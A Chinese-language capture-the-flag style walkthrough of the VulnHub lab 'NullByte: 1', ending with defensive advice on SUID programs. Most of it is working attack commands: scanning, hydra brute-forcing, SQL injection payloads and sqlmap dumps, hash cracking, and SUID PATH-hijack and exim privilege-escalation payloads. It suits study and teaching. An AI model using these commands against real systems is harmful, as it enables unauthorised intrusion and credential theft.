NullByte: 1靶场渗透

NullByte: 1

来自 <NullByte: 1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.221

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.221

访问80端口开放的http服务

4,对网站子目录进行枚举爆破扫描

dirsearch -u http://192.168.23.221 -x 403,404

进行端口漏洞扫描

nmap --script=vuln -p 80,111,777,59147 192.168.23.221

5,访问存在的网页目录

http://192.168.23.221/phpmyadmin/

查看默认页面源代码

下载图片由此得到重要提示

wget http://192.168.23.221/main.gif

exiftool main.gif

没想到是网站的一个目录,访问之

http://192.168.23.221/kzMb5nVYJw/

6,尝试使用hydra爆破出key值

gunzip /usr/share/wordlists/rockyou.txt.gz

hydra 192.168.23.221 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l bossfrank -P /usr/share/wordlists/rockyou.txt

登录成功

http://192.168.23.221/kzMb5nVYJw/index.php

访问这个网站 http://192.168.23.221/kzMb5nVYJw/420search.php

7,输入用户名isis

观察网页结构,合理怀疑网站通过GET请求传入的用户名进行相应的sql查询,那么可以测试时候网站对单双引号敏感,也就是是否存在sql注入。输入双引号,发现报错,而单引号不报错

"--+ 发现不报错,说明是单引号GET型注入

开始进行手工注入

"%20order%20by%203--+

"%20order%20by%204--+

通过sql注入判断网站至少存在3行,但又小于4行

然后通过union select判断回显位置

" union select 1,2,3--+

爆出数据库名,数据库版本,还有当前用户

" union select database(),version(),user() -- -

爆出数据库系统下所有的数据库名

" union select table_schema, 2, 3 from information_schema.tables -- -

知道了数据库名为seth,接下来从记录了所有数据表名的总表中爆出seth下所有数据表

" union select table_name,2,3 from information_schema.tables where table_schema='seth' -- -

知道了数据表名为users,接下来从记录了所有字段名的总表中爆出字段名

" union select column_name,2,3 from information_schema.columns where table_schema='seth' and table_name='users' -- -

从users数据表爆出id,user,pass字段的内容

" union select id,user,pass from users -- -

由此爆出来ramses的密码YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE

也可以使用sqlmap自动化注入

sqlmap -u 'http://192.168.23.221/kzMb5nVYJw/420search.php?usrtosearch=' --dbs

sqlmap -u 'http://192.168.23.221/kzMb5nVYJw/420search.php?usrtosearch=' -D seth --tables

sqlmap -u 'http://192.168.23.221/kzMb5nVYJw/420search.php?usrtosearch=' -D seth -T users --columns

sqlmap -u 'http://192.168.23.221/kzMb5nVYJw/420search.php?usrtosearch=' --dump

8,判断这段密文的加密方式,首先base64解码

echo 'YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE' |base64 -d

解得 c6d6bd7ebf806f43c76acc3681703b81 

hash-identifier 'c6d6bd7ebf806f43c76acc3681703b81'

判断出来是MD5值,然后使用MD5解密网站,解密得到ramses的密码omega

9,然后使用ssh登录ramses用户,端口需要指定777

ssh ramses@192.168.23.221 -p 777

信息收集一下,查看这个用户运行过的命令

发现跑过一个文件,去查看一下是什么东西

不知道是做什么,但是发现当前用户是可以执行这个文件的,执行之

sudo

find / -perm -4000 2>/dev/null

这个文件具有suid权限,可以被提权利用

可能的提权利用点:

  1. procwatch SUID程序路径劫持
  • 该程序调用ps命令但未使用绝对路径
  • 通过PATH环境变量劫持执行恶意ps

利用步骤:

# 在可写目录创建恶意ps脚本
echo '/bin/bash -p' > /tmp/ps
chmod +x /tmp/ps

# 劫持PATH变量并执行procwatch
export PATH=/tmp:$PATH
/var/www/backup/procwatch

2,pkexec提权 (CVE-2021-4034)

  • 检查pkexec版本是否低于0.105
  • 使用已知漏洞利用代码提权

3,exim4提权 (CVE-2016-1531)

  • 检查exim版本是否为4.84-3
  • 执行payload:sudo exim -ps '$(chmod +s /bin/bash)'

4,利用at命令

  • 创建定时任务获取root shell

echo '/bin/bash -p' | at now

最可能成功的路径是procwatch的PATH劫持,因为:

  • 该程序位于web目录且具有SUID
  • 输出结果包含ps命令的输出
  • 典型路径配置漏洞特征

10,尝试提权

ln -s /bin/sh ps

ls -la

export PATH=.:$PATH

./procwatch

成功变为root用户

该提权过程利用了SUID程序的环境变量路径劫持漏洞,具体原理如下:

  1. SUID权限特性
  • procwatch是root拥有的SUID程序(权限4755)
  • 执行时会以root身份运行(即使由普通用户启动)
  1. 符号链接劫持

ln -s /bin/sh ps

  • 在当前目录创建名为ps的符号链接,指向/bin/sh(系统shell)
  1. PATH环境变量污染

export PATH=.:$PATH

  • 将当前目录设为PATH搜索路径的最高优先级
  • 系统执行命令时会优先在当前目录查找
  1. 恶意调用链

./procwatch

触发过程:

procwatch (root权限运行)
  → 调用系统命令 `ps`
  → 根据PATH优先查找当前目录
  → 执行当前目录的伪ps程序
  → 实际执行 /bin/sh
  → 继承root权限启动shell

  1. 提权成功验证
  • 新启动的shell进程UID=0(root)
  • 可执行whoami验证身份
  • 能够访问所有受保护的系统资源

关键漏洞点

  • SUID程序未使用绝对路径调用系统命令(/bin/ps)
  • 允许用户控制PATH环境变量
  • 当前目录具有可写权限

防御建议

  1. 对于SUID程序:
    • 始终使用绝对路径调用外部命令
    • 清除危险环境变量(sanitize environment)
    • 通过chroot限制文件系统访问
  2. 系统安全配置:
    • 在/etc/sudoers中设置 secure_path
    • 避免将可写目录加入PATH
    • 定期审计SUID/SGID文件